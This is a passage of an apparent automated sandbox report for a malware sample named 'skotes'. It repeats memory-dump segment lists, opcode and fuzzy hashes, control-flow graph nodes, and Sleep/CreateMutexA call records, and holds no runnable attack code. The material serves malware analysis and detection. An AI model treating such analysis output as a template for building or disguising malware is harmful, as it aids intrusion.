                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 04a36fcd3c3068b002082084cb093f9089749f9aaae7fc9a55f6fda45d12c3c7
                                                                                                                                                                                                                                                                • Instruction ID: 9a4f00c8ad3393f51d573175b894d48c2e8a482b576464072caea7cf53630a25
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04a36fcd3c3068b002082084cb093f9089749f9aaae7fc9a55f6fda45d12c3c7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25312A31B002059BEB08DB7CDD897AEB776DBCA324F248618E018972D1D7768981CB92

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 238 9a9adc-9a9ae8 239 9a9aea-9a9af8 238->239 240 9a9afe-9a9b27 call 9bd663 238->240 239->240 241 9aa917 239->241 248 9a9b29-9a9b35 240->248 249 9a9b55-9a9b57 240->249 243 9aa953-9aa994 Sleep CreateMutexA 241->243 244 9aa917 call 9d6c6a 241->244 252 9aa996-9aa998 243->252 253 9aa9a7-9aa9a8 243->253 244->243 254 9a9b4b-9a9b52 call 9bd663 248->254 255 9a9b37-9a9b45 248->255 250 9a9b59-9aa916 call 9b80c0 249->250 251 9a9b65-9a9d91 call 9b7a00 call 9a5c10 call 9a8b30 call 9b8220 call 9b7a00 call 9a5c10 call 9a8b30 call 9b8220 249->251 252->253 258 9aa99a-9aa9a5 252->258 254->249 255->241 255->254 258->253
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 009AA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 639a5f93dba248182210d1b93f35d1ab0a4127b955788a96e5dc0189b89b7515
                                                                                                                                                                                                                                                                • Instruction ID: 1583b65b083f6ae86aa67574b962f69192073685de9482aec806a372f42fb1fe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 639a5f93dba248182210d1b93f35d1ab0a4127b955788a96e5dc0189b89b7515
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13216B32704205DBEB18AB6CECC97ADF769EFDA310F204219E408D72D1D7769981CB91

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 315 9aa856-9aa86e 316 9aa89c-9aa89e 315->316 317 9aa870-9aa87c 315->317 320 9aa8a9-9aa8b1 call 9a7d30 316->320 321 9aa8a0-9aa8a7 316->321 318 9aa87e-9aa88c 317->318 319 9aa892-9aa899 call 9bd663 317->319 318->319 322 9aa94e-9aa987 call 9d6c6a Sleep CreateMutexA 318->322 319->316 331 9aa8b3-9aa8bb call 9a7d30 320->331 332 9aa8e4-9aa8e6 320->332 324 9aa8eb-9aa916 call 9b80c0 321->324 335 9aa98e-9aa994 322->335 331->332 339 9aa8bd-9aa8c5 call 9a7d30 331->339 332->324 337 9aa996-9aa998 335->337 338 9aa9a7-9aa9a8 335->338 337->338 340 9aa99a-9aa9a5 337->340 339->332 343 9aa8c7-9aa8cf call 9a7d30 339->343 340->338 343->332 347 9aa8d1-9aa8d9 call 9a7d30 343->347 347->332 350 9aa8db-9aa8e2 347->350 350->324
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 009AA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: f5ae50a5a35547c26b10efc1e0ee04daba67dd9e9e171546d74ec80aa38e1afb
                                                                                                                                                                                                                                                                • Instruction ID: 9d2e984eae96deed650be0e52d158356b924d1bc054417a63151f0c7f4d4fc09
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5ae50a5a35547c26b10efc1e0ee04daba67dd9e9e171546d74ec80aa38e1afb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F213A313452059BEB2867ADDC8B77EB3659FC7704F244816E108D62D2CB7E8981C6E3

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 292 9aa34f-9aa35b 293 9aa35d-9aa36b 292->293 294 9aa371-9aa39a call 9bd663 292->294 293->294 295 9aa93a 293->295 300 9aa3c8-9aa916 call 9b80c0 294->300 301 9aa39c-9aa3a8 294->301 298 9aa953-9aa994 Sleep CreateMutexA 295->298 299 9aa93a call 9d6c6a 295->299 307 9aa996-9aa998 298->307 308 9aa9a7-9aa9a8 298->308 299->298 302 9aa3aa-9aa3b8 301->302 303 9aa3be-9aa3c5 call 9bd663 301->303 302->295 302->303 303->300 307->308 311 9aa99a-9aa9a5 307->311 311->308
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 009AA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
